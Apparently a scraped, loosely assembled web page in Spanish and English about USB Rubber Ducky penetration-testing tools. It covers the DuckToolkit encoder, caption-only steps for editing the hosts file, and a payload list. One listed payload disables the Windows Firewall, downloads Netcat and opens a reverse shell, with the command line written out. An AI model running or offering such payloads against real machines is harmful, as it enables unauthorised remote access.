Ejecutar un script con cmdlets codificados en Base64 sin cambiar la directiva de ejecución (versión reducida)

ejecutar-un-script-con-cmdlets-codificados-en-base64-sin-cambiar-la-directiva-de-ejecucion-version-reducida

ejecutar-script

Encoding Tools for Rubber Ducky

DuckToolkit

Encoding Tools for Rubber Ducky. The duck tools are available in the browser at https://ducktoolkit.com. From here you can also generate payloads from a selection of predefined scripts and templates.

Disclaimer

The Duck Toolkit is an open source Penetration Testing tool for authorized network auditing and security analysis purposes only where permitted. Users are solely responsible for compliance with all laws of their locality. The Duck Toolkit software developers and affiliates claim no responsibility for unauthorized or unlawful use.

Installation

Download the release and install with python setup.py install

Or

sudo pip install --upgrade ducktoolkit

There are no external dependencies other than python. This has been tested on Ubuntu and Windows 10

Usage

The DuckToolkit is provided with a script that will allow you to easily encode and decode your files.

Encode

To encode point the script at your duckcode.txt file, select an output and a language as show in the example below:

ducktools.py -e -l gb /path/to/duck_text.txt /path/to/output.bin

Decode

To decode point the script at your inject.bin file, select an output and a language as show in the example below:

ducktools.py -d -l gb /path/to/inject.bin /path/to/output.txt

More information

https://github.com/kevthehermit/DuckToolkit

Ejecutar un script con cmdlets codificados en Base64 sin cambiar la directiva de ejecución

 

Modificar el archivo Host utilizando Rubber Ducky

Pasos para crear y codificar el script para Rubber Ducky:

  1. Crear el script en Notepad
  2. Codificar el script con Duck Encoder
  3. Copiar el fichero codificado al USB Rubber Ducky
  4. Probar el USB Rubber Ducky

Crear el script „hosts.txt“ en Notepad

Crear el script hosts.txt en Notepad

Codificar el script „hosts.txt“ con Duck Encoder

Codificar el script con Duck Encoder

Copiar el fichero codificado „inject.bin“ al USB Rubber Ducky

Copiar el fichero codificado inject.bin al USB Rubber Ducky

Probar el USB Rubber Ducky

Probar el USB Rubber Ducky en un equipo

 

Payloads Rubber Ducky

The USB Rubber Ducky is a Human Interface Device programmable with a simple scripting language allowing penetration testers to quickly and easily craft and deploy security auditing payloads that mimic human keyboard input. The source is written in C and requires the AVR Studio 5 IDE from atmel.com/avrstudio. Hardware is commercially available at hakshop.com. Tools and payloads can be found at usbrubberducky.com. Quack!

Payloads:

More Payloads

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Capture a single image from a webcam

 

Payload Netcat download and reverse shell

This script will:

  • Disable the Microsoft Windows Firewall
  • Download Netcat
  • Run Netcat mode reverse shell (nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe)

 

Registry Hack to set Internet Explorer Start Page